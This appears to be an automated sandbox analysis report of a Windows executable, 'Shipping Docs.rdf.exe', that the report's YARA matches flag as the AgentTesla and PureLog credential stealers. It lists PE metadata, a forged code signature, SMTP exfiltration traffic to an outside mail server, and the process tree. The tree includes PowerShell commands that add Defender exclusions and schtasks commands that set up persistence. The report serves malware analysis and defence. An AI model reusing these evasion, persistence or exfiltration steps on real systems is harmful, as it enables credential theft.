DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66397AD8 [Tue May 7 00:50:32 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
xor al, 47h
push ebx
inc edi
add byte ptr [eax], al
add byte ptr [eax], al
dec ebx
inc ebp
dec edi
xor eax, 00000047h
xor al, 48h
dec eax
inc ecx
xor eax, 38543451h
inc edi
inc esp
push esi
push ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb1278	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb2000	0x14ec	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb2000	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xaf2f0	0xaf800	9d83da22068f75144d0d1c93da29b431	False	0.9361993077813391	data	7.942823265219137	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb2000	0x14ec	0x1800	99932a7c60ab731cfb83ad9278a6c60d	False	0.6300455729166666	data	7.158900728310187	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb4000	0xc	0x800	70608950008f9c5f455862375c12eb03	False	0.015625	data	0.03037337037012526	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xb2160	0xf3b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8120030777122339
RT_GROUP_ICON	0xb309c	0x14	data	0.9
RT_GROUP_ICON	0xb30b0	0x14	data	1.05
RT_VERSION	0xb30c4	0x23c	data	0.4772727272727273
RT_MANIFEST	0xb3300	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 7, 2024 07:19:58.130868912 CEST	49704	587	192.168.2.7	5.144.130.49
May 7, 2024 07:19:58.377826929 CEST	587	49704	5.144.130.49	192.168.2.7
May 7, 2024 07:19:58.377901077 CEST	49704	587	192.168.2.7	5.144.130.49
May 7, 2024 07:19:59.049958944 CEST	587	49704	5.144.130.49	192.168.2.7
May 7, 2024 07:19:59.050597906 CEST	49704	587	192.168.2.7	5.144.130.49
May 7, 2024 07:19:59.297710896 CEST	587	49704	5.144.130.49	192.168.2.7
May 7, 2024 07:19:59.297877073 CEST	49704	587	192.168.2.7	5.144.130.49
May 7, 2024 07:19:59.546984911 CEST	587	49704	5.144.130.49	192.168.2.7
May 7, 2024 07:19:59.621776104 CEST	49704	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:00.236130953 CEST	49704	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:00.486560106 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:00.746314049 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:00.746490002 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:01.011665106 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:01.011879921 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:01.271899939 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:01.272182941 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:01.534440041 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:01.590471029 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:01.698796034 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:01.979480028 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:01.979500055 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:01.979506016 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:01.979567051 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:01.998265982 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:02.259243965 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:02.403196096 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:02.419747114 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:02.679822922 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:02.709256887 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:02.978844881 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:02.979928017 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:03.283173084 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:03.375591993 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:03.375893116 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:03.636085987 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:03.636131048 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:03.636415958 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:03.936464071 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:03.939698935 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:03.946429014 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:04.206254005 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:04.206269979 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:04.207062006 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:04.207119942 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:04.207149029 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:04.207166910 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:20:04.466969967 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:04.466988087 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:04.467334032 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:04.476037025 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:20:04.606082916 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:21:40.497698069 CEST	49706	587	192.168.2.7	5.144.130.49
May 7, 2024 07:21:40.758300066 CEST	587	49706	5.144.130.49	192.168.2.7
May 7, 2024 07:21:40.761985064 CEST	49706	587	192.168.2.7	5.144.130.49

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 7, 2024 07:19:57.613868952 CEST	52368	53	192.168.2.7	1.1.1.1
May 7, 2024 07:19:58.117702007 CEST	53	52368	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 7, 2024 07:19:57.613868952 CEST	192.168.2.7	1.1.1.1	0x5dab	Standard query (0)	mail.parsdarou.ir	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 7, 2024 07:19:58.117702007 CEST	1.1.1.1	192.168.2.7	0x5dab	No error (0)	mail.parsdarou.ir		5.144.130.49	A (IP address)	IN (0x0001)	false

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
May 7, 2024 07:19:59.049958944 CEST	587	49704	5.144.130.49	192.168.2.7	220-linux19.centraldnserver.com ESMTP Exim 4.96.2 #2 Tue, 07 May 2024 08:49:58 +0330 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
May 7, 2024 07:19:59.050597906 CEST	49704	587	192.168.2.7	5.144.130.49	EHLO 035347
May 7, 2024 07:19:59.297710896 CEST	587	49704	5.144.130.49	192.168.2.7	250-linux19.centraldnserver.com Hello 035347 [156.146.37.102] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
May 7, 2024 07:19:59.297877073 CEST	49704	587	192.168.2.7	5.144.130.49	STARTTLS
May 7, 2024 07:19:59.546984911 CEST	587	49704	5.144.130.49	192.168.2.7	220 TLS go ahead
May 7, 2024 07:20:01.011665106 CEST	587	49706	5.144.130.49	192.168.2.7	220-linux19.centraldnserver.com ESMTP Exim 4.96.2 #2 Tue, 07 May 2024 08:50:00 +0330 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
May 7, 2024 07:20:01.011879921 CEST	49706	587	192.168.2.7	5.144.130.49	EHLO 035347
May 7, 2024 07:20:01.271899939 CEST	587	49706	5.144.130.49	192.168.2.7	250-linux19.centraldnserver.com Hello 035347 [156.146.37.102] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
May 7, 2024 07:20:01.272182941 CEST	49706	587	192.168.2.7	5.144.130.49	STARTTLS
May 7, 2024 07:20:01.534440041 CEST	587	49706	5.144.130.49	192.168.2.7	220 TLS go ahead

Target ID:	0
Start time:	07:19:53
Start date:	07/05/2024
Path:	C:\Users\user\Desktop\Shipping Docs.rdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Shipping Docs.rdf.exe"
Imagebase:	0xaf0000
File size:	742'920 bytes
MD5 hash:	F2BCF5A8F702DFE1879495F5428D2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1231304575.0000000005A00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1229585940.000000000423B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1229585940.000000000423B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1227838638.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1227838638.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:19:54
Start date:	07/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Docs.rdf.exe"
Imagebase:	0x600000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:19:54
Start date:	07/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:19:54
Start date:	07/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SVcPIbJno.exe"
Imagebase:	0x600000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:19:54
Start date:	07/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:19:54
Start date:	07/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmpF63B.tmp"
Imagebase:	0xc20000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:19:54
Start date:	07/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:19:54
Start date:	07/05/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	07:19:54
Start date:	07/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xc10000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1245608119.0000000002F12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1241904701.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1241904701.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1245608119.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1245608119.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:19:55
Start date:	07/05/2024
Path:	C:\Users\user\AppData\Roaming\SVcPIbJno.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\SVcPIbJno.exe
Imagebase:	0x5b0000
File size:	742'920 bytes
MD5 hash:	F2BCF5A8F702DFE1879495F5428D2C2A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1282453180.0000000003C7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1282453180.0000000003C7D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs Detection: 44%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:19:57
Start date:	07/05/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:19:58
Start date:	07/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SVcPIbJno" /XML "C:\Users\user\AppData\Local\Temp\tmp59D.tmp"
Imagebase:	0xc20000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:19:58
Start date:	07/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:19:58
Start date:	07/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xd80000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2448473771.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2448473771.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2448473771.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.2448473771.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	07:20:08
Start date:	07/05/2024
Path:	C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Imagebase:	0x870000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:20:08
Start date:	07/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:20:18
Start date:	07/05/2024
Path:	C:\Users\user\AppData\Roaming\boqXv\boqXv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\boqXv\boqXv.exe"
Imagebase:	0x3c0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:20:18
Start date:	07/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	268
Total number of Limit Nodes:	20

Executed Functions

Function 0733AF68 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f305b8db18aa769241477cb2c31bdf283be357a6646525d1f0a16bd51ddf94
Instruction ID: 0531a0e942827e4abc28b855f952b84c1da0a7c23e19583341524be00ee939e9
Opcode Fuzzy Hash: b4f305b8db18aa769241477cb2c31bdf283be357a6646525d1f0a16bd51ddf94
Instruction Fuzzy Hash: 3DE19DF1B016469FEB29DB65C450BAEB7F6AFC8300F14846DE14ADB294CB39D902CB51

Uniqueness

Uniqueness Score: -1.00%

Function 015BD031 Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015BD0BE
GetCurrentThread.KERNEL32 ref: 015BD0FB
GetCurrentProcess.KERNEL32 ref: 015BD138
GetCurrentThreadId.KERNEL32 ref: 015BD191

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e0e295d1318428fadc7e13d8fe51bfea88599e92abe40b4696ab9513449bcf52
Instruction ID: 79ccd6df30cb60cb52f6862fc3a2d6e17de9c4ef4f2cb87b6667edb0bd670dd8
Opcode Fuzzy Hash: e0e295d1318428fadc7e13d8fe51bfea88599e92abe40b4696ab9513449bcf52
Instruction Fuzzy Hash: 205134B49012498FEB18CFA9C588BEEBBF1FF88314F248459E119AB3A0D7745944CB65

Uniqueness

Uniqueness Score: -1.00%

Function 015BD040 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 015BD0BE
GetCurrentThread.KERNEL32 ref: 015BD0FB
GetCurrentProcess.KERNEL32 ref: 015BD138
GetCurrentThreadId.KERNEL32 ref: 015BD191

Memory Dump Source

Source File: 00000000.00000002.1226380367.00000000015B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15b0000_Shipping Docs.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 10d6c039346a8255307cad8a28b757b33a2f65f918593b4cb3549bbe6083f9f1
Instruction ID: 2f9033de474b7e7818f23d65278168a5458b21584b9f088390730a0dde1535dd
Opcode Fuzzy Hash: 10d6c039346a8255307cad8a28b757b33a2f65f918593b4cb3549bbe6083f9f1
Instruction Fuzzy Hash: 3A5145B4901209CFEB18DFA9C988BDEBBF1FF88314F208459E119AB3A0D7745844CB65

Uniqueness

Uniqueness Score: -1.00%

Function 07336165 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 073363A6

Memory Dump Source

Source File: 00000000.00000002.1231639994.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7330000_Shipping Docs.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d3f9ff37310d72522f452d5d1d0506ae19d573ce6f331601929912cd39624d69
Instruction ID: bf338b50e7a7b0554c514803f150242434c66fde018407dd5e0e3c7e4bbf32ee
Opcode Fuzzy Hash: d3f9ff37310d72522f452d5d1d0506ae19d573ce6f331601929912cd39624d69
Instruction Fuzzy Hash: A4A14CB1D00319DFEB24DFA8C841BDDBBB2BF48310F158169E809A7250DB759985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 07336170 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 073363A6

Memory Dump Source

